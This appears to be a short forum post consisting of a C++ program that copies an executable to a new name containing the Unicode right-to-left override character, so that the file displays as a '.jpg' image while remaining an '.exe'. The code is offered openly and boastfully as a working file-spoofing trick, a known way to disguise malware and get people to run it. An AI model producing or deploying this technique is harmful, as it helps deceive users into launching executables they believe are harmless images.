It looks like you're new here. If you want to get involved, click one of these buttons!
#include <iostream>
#include <Windows.h>
int main()
{
//wchar_t cuz of unicode
wchar_t target[] = L\"test.exe\";
wchar_t output[] = L\"new-\u202E.gpj.exe\";
CopyFileW(target,output,false);
std::cout << \"1337 file spoofing done omfg ^.^\" << std::endl;
std::cin.get();
return 0;
}